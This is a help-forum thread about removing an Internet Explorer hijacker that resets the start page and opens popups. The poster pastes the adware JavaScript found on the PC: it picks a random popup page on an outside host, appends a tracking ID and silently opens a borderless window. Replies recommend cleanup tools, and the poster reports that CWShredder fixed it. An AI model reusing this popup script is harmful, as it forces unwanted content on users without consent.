Search for...

Hi, I need your expert opinion and help in the problem that I am having.
Here is the senario.
(1) Double click on IE
(2) Seach For... page loads despite that I have "blank" page setup.
No URL's. I think it's an html file downloaded onto my machine.
(3) A seond or two later. I get a popup window.
No URL's. Agian, it's inside my PC.

I saved the Search For page and discovered that there's an index file that gets triggered. Here is how it goes.
try{ function random(num){return Math.floor(Math.random()*num)} var ap=new Array("popup2.php","popup3.php","popup5.php","popup6.php","popup7.php","popup14.php"); var u="http://4bf65.ilxt.info/"+ap[random(ap.length)]; var center_x = screen.width/2-400/2; var center_y = screen.height/2-300/2; for(i=0;i<document.all.length;i++) { if(document.all.tagName=='SCRIPT'&& (idx=document.all.src.indexOf('?pin='))>0) { u+=document.all.src.substr(idx); } } open(u, "_blank", "channelmode=0,directories=0,fullscreen=no,location=0,menubar=0,scrollbars=0,status=0,titlebar=0,toolbar=0,resizable=1,width=400,height=300,top="+center_y+",left="+center_x); }catch(e){}

I think I started to have this problem a day or two after I upgraded my ICQ Lite software. I thinks this is a bengin adware and not causing security breach or anything but it's very annoying. Please help how I can get rid of this thins.

Thanks, JN

 

Sounds like you need "Hijack This!"

I would be willing to bet in your C:WINDOWS folder there is an html file doing this, but deleting will not fix it.

You mine as well download Hijack This! as well as...

Spybot S&D 1.3
Ad-aware

Good luck

 

Hi, thanks for the reply.
I will look into downloading "HiJack This!"
---JN

 

Hi,
CWShredder.exe worked like a charm.

Spybot and Ad-aware took forever to scan and
when PC was supposedly fixed, shut down the PC, and reboot like 30 seconds,
the problem returns everytime. I suppose the program manefested deep inside where these two software could not reach. The symptoms might be eradicated but the minute the machine is rebooted, the program reinserted itself. That's my observation.

I tried HijackThis and it had some errors on my PC. I didn't quite understand what it meant. I didn't know where to look, either.

In desperation, I re-installed all the components of Internet Explore in the hope that it will overwrite the infected registry. Nope, whoever wrote this strain of adware antinipated component re-installation too. Darn.

CWShredder.exe was my last hope. It was fast and very intuitive giving the live feedback while it was scanning various strains of infection and if not found, "nonexitent" and moved down the list. It found 7 incidents of altered registry and told me they were all fixed. When I restarted the machine,
I crossed my fingures in both hands. Viola, the infection is gone now.


Next time, I'd go straight to CWShredder.exe.
Thanks all for your help.
--JN